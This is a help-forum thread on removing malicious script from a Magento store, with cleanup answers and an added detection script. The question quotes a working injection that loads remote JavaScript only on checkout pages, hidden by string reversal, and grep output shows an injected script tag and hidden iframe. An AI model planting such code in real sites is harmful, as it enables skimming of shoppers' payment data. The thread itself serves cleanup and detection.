
I have a malicious script that’s been inserted right after the body tag and I don’t know which file to check to remove it. I’ve checked everywhere in the admin as well as the template files and it’s nowhere to be found. The virus looks like this:

    if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))
    {document.write('>tpircs/<>"sj.tekramroced/crs/knil.sj-knil//:sptth"=crs tpircs<'.split("").reverse().join(""))};

2 Answers


  1. Please try the approaches below.

    I would recommend the following approach for removing third party scripts in Magento:

    > Approach 1. Please go to your theme directory app/design/frontend/Yourtheme/default/template/page/, open the following files, find this code and comment it out, then clear the cache and check your store.

    <?php echo $this->getAbsoluteFooter() ?>
    

    1column.phtml

    2columns-left.phtml

    2columns-right.phtml

    3columns.phtml

    All miscellaneous code comes under the getAbsoluteFooter() function.

    > Approach 2: Go to Admin Panel: General > Design > Footer > Miscellaneous HTML

    > Approach 3: Go to the local.xml/page.xml file and check for the code below; it might have been added in the same file like this:

    <block type="core/text_list" name="after_body_start" as="after_body_start" translate="label">
        <label>Page Top</label>
    </block>
    

    Hope it’s helpful for you.

  2. As long as you know what the names of the scripts are, it’s easy to get rid of these malicious scripts.

    I had many of these scripts injected into my website, most of them were scripts and iframes pointing to a domain http://siteverification.online.

    I am not a Magento expert but I figured that they can come from only 2 places:

    1. The Database
    2. Filesystem (HTML templates or PHP files)

    For the database, I am using MySQL, and since I have PhpMyAdmin installed I took advantage of its Search function, which can search all fields of all tables of the database. I just searched for siteverification.online and found some entries, and deleted them.

    For the filesystem, I logged on through SSH and just searched the whole Magento website filesystem, like this:

    $ grep -r "siteverification.online" /var/www/magento-project
      ./index.php:print('<script type="text/javascript" src="http://siteverification.online/lib/status.js"></script>');
      ./index.php:print('<iframe src="http://siteverification.online/" frameborder="0" width="0" height="0"></iframe>');
    

    In my case it turns out that some PHP code was injected in index.php. But if code was injected in any other php or html file this would find them as well since the search is recursive (-r flag).

    That’s it. I don’t even understand Magento’s filesystem and database structures, but using these radical search methods I got rid of all the malware in a few minutes.

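The grep above works when you already know the injected domain. The snippet in the question hides its domain by storing the tag reversed and un-reversing it with split("").reverse().join(""), so a plain grep for the domain finds nothing. The scanner below is an added example (not code from either answer or from Magento): it walks a directory tree, flags that split/reverse/join pattern, decodes the payload so you can see which src is actually written, and notes whether the write is gated on checkout-page URLs as in the question. The domain in the constructed sample is a placeholder.

```python
import re
from pathlib import Path

# Indicators modelled on the snippet in the question: a RegExp gate on checkout-style
# URL paths, and a document.write of a string that is reversed at runtime.
CHECKOUT_GATE = re.compile(r"RegExp\(\s*['\"][^'\"]*(?:onepage|checkout|onestep|firecheckout)")
REVERSED_WRITE = re.compile(
    r"document\.write\(\s*(['\"])(?P<payload>.*?)\1\s*"
    r"\.split\(\s*['\"]{2}\s*\)\s*\.reverse\(\)\s*\.join\(\s*['\"]{2}\s*\)",
    re.S,
)

def decode_reversed(payload: str) -> str:
    """Undo the split("").reverse().join("") trick to show what the browser would write."""
    return payload[::-1]

def scan_text(text: str) -> list:
    """One finding per reversed document.write: offset, decoded tag, its src, and whether
    a checkout-URL gate appears in the preceding 300 characters."""
    findings = []
    for m in REVERSED_WRITE.finditer(text):
        decoded = decode_reversed(m.group("payload"))
        src = re.search(r'src\s*=\s*["\']([^"\']+)', decoded)
        findings.append({
            "offset": m.start(),
            "checkout_gated": bool(CHECKOUT_GATE.search(text[max(0, m.start() - 300):m.start()])),
            "decoded": decoded,
            "src": src.group(1) if src else None,
        })
    return findings

def scan_tree(root: str, suffixes=(".phtml", ".php", ".html", ".js", ".xml", ".sql")) -> dict:
    """Walk a Magento install (include a .sql dump to cover the database) and map
    each file path to its findings; files with no hits are omitted."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_text(path.read_text(errors="ignore"))
            if hits:
                results[str(path)] = hits
    return results

# Constructed sample in the shape of the question's snippet, with a placeholder domain.
SAMPLE = (
    "<body>if((new RegExp('onepage|checkout|onestep|firecheckout')).test(window.location))"
    "{document.write('" + '<script src="https://example.invalid/x.js"></script>'[::-1]
    + "'.split(\"\").reverse().join(\"\"))};"
)

if __name__ == "__main__":
    for hit in scan_text(SAMPLE):
        print(hit["src"], "gated on checkout URLs:", hit["checkout_gated"])
```

Run it as `scan_tree("/var/www/magento-project")` after exporting the database with mysqldump into the same tree, since the second answer notes the injection can live in either place.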